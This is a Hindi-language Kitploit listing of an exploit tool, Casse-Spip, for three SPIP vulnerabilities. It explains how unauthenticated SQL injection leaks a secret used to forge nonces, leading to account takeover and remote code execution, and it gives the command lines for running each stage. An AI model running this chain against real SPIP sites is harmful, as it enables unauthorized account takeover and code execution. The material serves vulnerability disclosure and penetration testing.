Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
spip-exploits — SPIP CVE 2026-72708/72709/72710 के लिए Python exploit chain, जो unauthenticated SQL injection को account takeover और remote code execution से जोड़ता है। | Kitploit
उपकरण/GitHubGitHub/ambionics/spip-exploits
शोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगपेपर और शोध
GitHubambionics/spip-exploits

spip-exploits

SPIP CVE 2026-72708/72709/72710 के लिए Python exploit chain, जो unauthenticated SQL injection को account takeover और remote code execution से जोड़ता है।

रिपॉजिटरी देखें
11 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Casse-Spip (CVE-2026-72708, CVE-2026-72709, CVE-2026-72710)

अनधिकृत SQL इंजेक्शन से रिमोट कोड एक्ज़ीक्यूशन तक

Franck Chevalier (Wayko) द्वारा खोजे गए CVE-2026-72708, CVE-2026-72709 और CVE-2026-72710 के लिए एक्सप्लॉइट

पूरी तकनीकी गहराई में जाने के लिए, Lexfo के ब्लॉग पर पूरा लेख पढ़ें।

अस्वीकरण

यह रिपॉज़िटरी केवल शोध और रक्षात्मक सुरक्षा उद्देश्यों के लिए प्रदान की गई है। लेखक इस जानकारी के दुरुपयोग की कोई ज़िम्मेदारी नहीं लेता।


अवलोकन

प्रवेश बिंदु सार्वजनिक sitemap.xml पृष्ठ में एक SQL इंजेक्शन है जो alea_ephemere को लीक करता है।

उस सीक्रेट के साथ, अनाम क्रियाओं के लिए वैध nonces बनाए जा सकते हैं।

वहाँ से दो क्रियाएँ RCE तक ले जाती हैं:

  • action=editer_auteur अकाउंट टेकओवर, फिर प्राइवेट एरिया से RCE।
  • action=editer_objet मास असाइनमेंट, spip_jobs कतार में एक पंक्ति लिखने के लिए, फिर action=cron के माध्यम से उसे निष्पादित करना।

शोषण

सेटअप

root@kitploit:~
python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help

पहचान

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000

पूरी चेन 1 : अकाउंट टेकओवर (CVE-2026-72708 > CVE-2026-72709)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"

ओवरराइट करने से पहले, --ato लक्ष्य के login और वर्तमान pass हैश को डंप करता है (SQLi के माध्यम से) ताकि आप बाद में --restore-hash के साथ उसे वापस रख सकें:

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1

पूरी चेन 2 : RCE (CVE-2026-72708 > CVE-2026-72709 > CVE-2026-72710)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"

फ़ाइल IMG/casse-spip_<token>.html में लिखी जाएगी।


संदर्भ

  • ब्लॉग पोस्ट - तकनीकी गहराई में विश्लेषण
  • Vulncheck - भेद्यता विवरण
  • CVE-2026-72708
  • CVE-2026-72709
  • CVE-2026-72710
टूल डाउनलोड करें